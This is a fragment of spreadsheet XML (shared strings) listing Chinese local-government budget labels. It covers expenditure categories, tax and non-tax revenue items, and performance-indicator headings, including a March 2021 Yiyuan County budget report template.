      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、国防支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、公共安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>五、教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>六、科学技术支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>七、文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>八、社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十、、卫生健康支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十一、节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十二、城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十三、农林水支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十四、交通运输支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十九、援助其他地区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十、自然资源海洋气象等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十一、住房保障支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十二、粮油物资储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十四、灾害防治及应急管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二十九、其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转移性支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上解支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体制上解支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项上解支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调出资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年终结余</t>
    </r>
  </si>
  <si>
    <t>第七部分 
相关情况说明</t>
  </si>
  <si>
    <t>2022年预算项目支出绩效目标表</t>
  </si>
  <si>
    <t>项目名称</t>
  </si>
  <si>
    <t>主管部门</t>
  </si>
  <si>
    <t>资金情况</t>
  </si>
  <si>
    <t>金额：</t>
  </si>
  <si>
    <t>总体目标</t>
  </si>
  <si>
    <t>绩效指标</t>
  </si>
  <si>
    <t>一级指标</t>
  </si>
  <si>
    <t>二级指标</t>
  </si>
  <si>
    <t>三级指标</t>
  </si>
  <si>
    <t>指标值</t>
  </si>
  <si>
    <t>年度绩效指标</t>
  </si>
  <si>
    <t>产出指标</t>
  </si>
  <si>
    <t>数量指标</t>
  </si>
  <si>
    <t>质量指标</t>
  </si>
  <si>
    <t>时效指标</t>
  </si>
  <si>
    <t>成本指标</t>
  </si>
  <si>
    <t>效益指标</t>
  </si>
  <si>
    <t>经济效益指标</t>
  </si>
  <si>
    <t>社会效益指标</t>
  </si>
  <si>
    <t>生态效益指标</t>
  </si>
  <si>
    <t>可持续影响指标</t>
  </si>
  <si>
    <t>……</t>
  </si>
  <si>
    <t>满意度指标</t>
  </si>
  <si>
    <t>服务对象满意度指标</t>
  </si>
  <si>
    <t>2021年3月沂源县预算收支月报</t>
  </si>
  <si>
    <t>历山</t>
  </si>
  <si>
    <t>南麻</t>
  </si>
  <si>
    <t>南鲁山</t>
  </si>
  <si>
    <t>鲁村</t>
  </si>
  <si>
    <t>悦庄</t>
  </si>
  <si>
    <t>东里</t>
  </si>
  <si>
    <t>西里</t>
  </si>
  <si>
    <t>大张庄</t>
  </si>
  <si>
    <t>燕崖</t>
  </si>
  <si>
    <t>中庄</t>
  </si>
  <si>
    <t>张家坡</t>
  </si>
  <si>
    <t>石桥</t>
  </si>
  <si>
    <t>单位:万元</t>
  </si>
  <si>
    <t>科目编码</t>
  </si>
  <si>
    <t>一般公共预算收入合计</t>
  </si>
  <si>
    <t>一般公共预算支出合计</t>
  </si>
  <si>
    <t xml:space="preserve">  税收收入</t>
  </si>
  <si>
    <t xml:space="preserve">  一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国内增值税</t>
  </si>
  <si>
    <t xml:space="preserve">    人大事务</t>
  </si>
  <si>
    <t xml:space="preserve">  　      国有企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      行政运行</t>
  </si>
  <si>
    <t xml:space="preserve">  　      集体企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      一般行政管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">  　      股份制企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      机关服务</t>
  </si>
  <si>
    <t xml:space="preserve">  　      联营企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      人大会议</t>
  </si>
  <si>
    <t xml:space="preserve">  　      港澳台和外商投资企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      人大立法</t>
  </si>
  <si>
    <t xml:space="preserve">  　      私营企业增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      人大监督</t>
  </si>
  <si>
    <t xml:space="preserve">  　      中国国家铁路集团有限公司改征增值税待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">      人大代表履职能力提升</t>
  </si>
  <si>
    <t xml:space="preserve">  　      中国国家铁路集团有限公司改征增值税收入</t>
  </si>
  <si>
    <t xml:space="preserve">      代表工作</t>
  </si>
  <si>
    <t xml:space="preserve">  　      其他增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      人大信访工作</t>
  </si>
  <si>
    <t xml:space="preserve">  　      增值税税款滞纳金、罚款收入</t>
  </si>
  <si>
    <t xml:space="preserve">      事业运行</t>
  </si>
  <si>
    <t xml:space="preserve">  　      残疾人就业增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他人大事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">          软件增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">    政协事务</t>
  </si>
  <si>
    <t xml:space="preserve">          宣传文化单位增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">          核电站增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">          资源综合利用增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">          成品油增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      政协会议</t>
  </si>
  <si>
    <t xml:space="preserve">          黄金增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      委员视察</t>
  </si>
  <si>
    <t xml:space="preserve">          光伏发电增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      参政议政</t>
  </si>
  <si>
    <t xml:space="preserve">          风力发电增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">  　      管道运输增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政协事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  　      融资租赁增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">    政府办公厅(室)及相关机构事务</t>
  </si>
  <si>
    <t xml:space="preserve">          增值税留抵退税</t>
  </si>
  <si>
    <t xml:space="preserve">          增值税留抵退税省级调库</t>
  </si>
  <si>
    <t xml:space="preserve">          增值税留抵退税省级以下调库</t>
  </si>
  <si>
    <t xml:space="preserve">          其他增值税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      专项服务</t>
  </si>
  <si>
    <t xml:space="preserve">  　      免抵调增增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      专项业务及机关事务管理</t>
  </si>
  <si>
    <t xml:space="preserve">          成品油价格和税费改革增值税划出</t>
  </si>
  <si>
    <t xml:space="preserve">      政务公开审批</t>
  </si>
  <si>
    <t xml:space="preserve">          成品油价格和税费改革增值税划入</t>
  </si>
  <si>
    <t xml:space="preserve">      信访事务</t>
  </si>
  <si>
    <t xml:space="preserve">    国内消费税</t>
  </si>
  <si>
    <t xml:space="preserve">      参事事务</t>
  </si>
  <si>
    <t xml:space="preserve">          其中：成品油消费税</t>
  </si>
  <si>
    <t xml:space="preserve">                成品油消费税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府办公厅(室)及相关机构事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    进口货物增值税、消费税</t>
  </si>
  <si>
    <t xml:space="preserve">    发展与改革事务</t>
  </si>
  <si>
    <t xml:space="preserve">      进口货物增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      进口消费品消费税</t>
  </si>
  <si>
    <t xml:space="preserve">          其中：进口成品油消费税</t>
  </si>
  <si>
    <t xml:space="preserve">                进口成品油消费税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      战略规划与实施</t>
  </si>
  <si>
    <t xml:space="preserve">    出口货物退增值税、消费税</t>
  </si>
  <si>
    <t xml:space="preserve">      日常经济运行调节</t>
  </si>
  <si>
    <t xml:space="preserve">        出口业务退增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      社会事业发展规划</t>
  </si>
  <si>
    <t xml:space="preserve">          出口业务退增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      经济体制改革研究</t>
  </si>
  <si>
    <t xml:space="preserve">          免抵调减增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      物价管理</t>
  </si>
  <si>
    <t xml:space="preserve">      出口消费品退消费税</t>
  </si>
  <si>
    <t xml:space="preserve">    企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他发展与改革事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有冶金工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    统计信息事务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有有色金属工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有煤炭工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有电力工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有石油和化学工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      信息事务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有机械工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      专项统计业务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有汽车工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      统计管理</t>
  </si>
  <si>
    <t xml:space="preserve">      国有核工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      专项普查活动</t>
  </si>
  <si>
    <t xml:space="preserve">      国有航空工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      统计抽样调查</t>
  </si>
  <si>
    <t xml:space="preserve">      国有航天工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有电子工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他统计信息事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有兵器工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    财政事务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有船舶工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有建筑材料工业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有烟草企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有纺织企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      预算改革业务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有铁道企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      财政国库业务</t>
  </si>
  <si>
    <t xml:space="preserve">         其中：中国国家铁路集团有限公司集中缴纳的铁路运输企业所得税待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">      财政监察</t>
  </si>
  <si>
    <t xml:space="preserve">      国有交通企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      信息化建设</t>
  </si>
  <si>
    <t xml:space="preserve">      国有邮政企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      财政委托业务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有民航企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有海洋石油天然气企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他财政事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有外贸企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    税收事务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有银行所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有非银行金融企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有保险企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有文教企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有水产企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">  　  税收业务</t>
  </si>
  <si>
    <t xml:space="preserve">      国有森林工业企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      国有电信企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他税收事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有农垦企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    审计事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      集体企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      股份制企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      联营企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      审计业务</t>
  </si>
  <si>
    <t xml:space="preserve">      港澳台和外商投资企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      审计管理</t>
  </si>
  <si>
    <t xml:space="preserve">      私营企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他企业所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      分支机构预缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他审计事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      总机构预缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    海关事务</t>
  </si>
  <si>
    <t xml:space="preserve">      总机构汇算清缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      企业所得税待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">      跨市县分支机构预缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      跨市县总机构预缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      缉私办案</t>
  </si>
  <si>
    <t xml:space="preserve">      跨市县总机构汇算清缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      口岸管理</t>
  </si>
  <si>
    <t xml:space="preserve">      省以下企业所得税待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">      跨市县分支机构汇算清缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      海关关务</t>
  </si>
  <si>
    <t xml:space="preserve">      分支机构汇算清缴所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      关税征管</t>
  </si>
  <si>
    <t xml:space="preserve">      企业所得税税款滞纳金、罚款、加收利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      海关监管</t>
  </si>
  <si>
    <t xml:space="preserve">    企业所得税退税</t>
  </si>
  <si>
    <t xml:space="preserve">      检验检疫</t>
  </si>
  <si>
    <t>10106</t>
  </si>
  <si>
    <t xml:space="preserve">    个人所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      个人所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他海关事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">         储蓄存款利息所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    纪检监察事务</t>
  </si>
  <si>
    <t xml:space="preserve">         军队个人所得税</t>
  </si>
  <si>
    <t xml:space="preserve">         其他个人所得税</t>
  </si>
  <si>
    <t xml:space="preserve">      个人所得税综合所得汇算清缴退税</t>
  </si>
  <si>
    <t xml:space="preserve">      个人所得税代扣代缴手续费退库</t>
  </si>
  <si>
    <t xml:space="preserve">      大案要案查处</t>
  </si>
  <si>
    <t xml:space="preserve">      个人所得税税款滞纳金、罚款、加收利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      派驻派出机构</t>
  </si>
  <si>
    <t xml:space="preserve">    资源税</t>
  </si>
  <si>
    <t xml:space="preserve">      巡视工作</t>
  </si>
  <si>
    <t xml:space="preserve">      海洋石油资源税</t>
  </si>
  <si>
    <t xml:space="preserve">      水资源税收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他纪检监察事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他资源税</t>
  </si>
  <si>
    <t xml:space="preserve">    商贸事务</t>
  </si>
  <si>
    <t xml:space="preserve">      资源税税款滞纳金、罚款收入</t>
  </si>
  <si>
    <t xml:space="preserve">    城市维护建设税</t>
  </si>
  <si>
    <t xml:space="preserve">  　    其中：中国国家铁路集团有限公司集中缴纳的铁路运输企业城市维护建设税待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">  　          成品油价格和税费改革城市维护建设税划出</t>
  </si>
  <si>
    <t xml:space="preserve">      对外贸易管理</t>
  </si>
  <si>
    <t xml:space="preserve">  　          成品油价格和税费改革城市维护建设税划入</t>
  </si>
  <si>
    <t xml:space="preserve">      国际经济合作</t>
  </si>
  <si>
    <t xml:space="preserve">    房产税</t>
  </si>
  <si>
    <t xml:space="preserve">      外资管理</t>
  </si>
  <si>
    <t xml:space="preserve">    印花税</t>
  </si>
  <si>
    <t xml:space="preserve">      国内贸易管理</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：证券交易印花税</t>
  </si>
  <si>
    <t xml:space="preserve">      招商引资</t>
  </si>
  <si>
    <t xml:space="preserve">    城镇土地使用税</t>
  </si>
  <si>
    <t xml:space="preserve">    土地增值税</t>
  </si>
  <si>
    <t xml:space="preserve">      其他商贸事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    车船税</t>
  </si>
  <si>
    <t xml:space="preserve">    知识产权事务</t>
  </si>
  <si>
    <t xml:space="preserve">    船舶吨税</t>
  </si>
  <si>
    <t xml:space="preserve">    车辆购置税</t>
  </si>
  <si>
    <t xml:space="preserve">    关税</t>
  </si>
  <si>
    <t xml:space="preserve">    耕地占用税</t>
  </si>
  <si>
    <t xml:space="preserve">      专利审批</t>
  </si>
  <si>
    <t xml:space="preserve">    契税</t>
  </si>
  <si>
    <t xml:space="preserve">      知识产权战略和规划</t>
  </si>
  <si>
    <t xml:space="preserve">    烟叶税</t>
  </si>
  <si>
    <t xml:space="preserve">      国际合作与交流</t>
  </si>
  <si>
    <t xml:space="preserve">    环境保护税</t>
  </si>
  <si>
    <t xml:space="preserve">      知识产权宏观管理</t>
  </si>
  <si>
    <t xml:space="preserve">    其他税收收入</t>
  </si>
  <si>
    <t xml:space="preserve">      商标管理</t>
  </si>
  <si>
    <t xml:space="preserve">  非税收入</t>
  </si>
  <si>
    <t xml:space="preserve">      原产地地理标志管理</t>
  </si>
  <si>
    <t xml:space="preserve">    专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      教育费附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他知识产权事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    教育费附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">    民族事务</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    成品油价格和税费改革教育费附加收入划出</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    成品油价格和税费改革教育费附加收入划入</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    中国国家铁路集团有限公司集中缴纳的铁路运输企业教育费附加</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    中国国家铁路集团有限公司集中缴纳的铁路运输企业教育费附加待分配收入</t>
  </si>
  <si>
    <t xml:space="preserve">      民族工作专项</t>
  </si>
  <si>
    <t xml:space="preserve">  　　    教育费附加滞纳金、罚款收入</t>
  </si>
  <si>
    <t xml:space="preserve">      铀产品出售收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民族事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      三峡库区移民专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    港澳台事务</t>
  </si>
  <si>
    <t xml:space="preserve">      场外核应急准备收入</t>
  </si>
  <si>
    <t xml:space="preserve">      地方教育附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">      文化事业建设费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人就业保障金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      港澳事务</t>
  </si>
  <si>
    <t xml:space="preserve">      教育资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      台湾事务</t>
  </si>
  <si>
    <t xml:space="preserve">      农田水利建设资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      森林植被恢复费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他港澳台事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      水利建设专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    档案事务</t>
  </si>
  <si>
    <t xml:space="preserve">      油价调控风险准备金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      专项收益上缴收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">          广告收入</t>
  </si>
  <si>
    <t xml:space="preserve">      档案馆</t>
  </si>
  <si>
    <t xml:space="preserve">          其他专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他档案事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    民主党派及工商联事务</t>
  </si>
  <si>
    <t xml:space="preserve">      公安行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      法院行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      司法行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      外交行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      商贸行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      财政行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民主党派及工商联事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      税务行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    群众团体事务</t>
  </si>
  <si>
    <t xml:space="preserve">      海关行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      审计行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国管局行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      科技行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      工会事务</t>
  </si>
  <si>
    <t xml:space="preserve">      保密行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      市场监管行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他群众团体事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      广播电视行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    党委办公厅(室)及相关机构事务</t>
  </si>
  <si>
    <t xml:space="preserve">      应急管理行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      档案行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      港澳办行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      贸促会行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      专项业务</t>
  </si>
  <si>
    <t xml:space="preserve">      人防办行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      中直管理局行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他党委办公厅(室)及相关机构事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      文化和旅游行政事业性收费收入</t>
  </si>
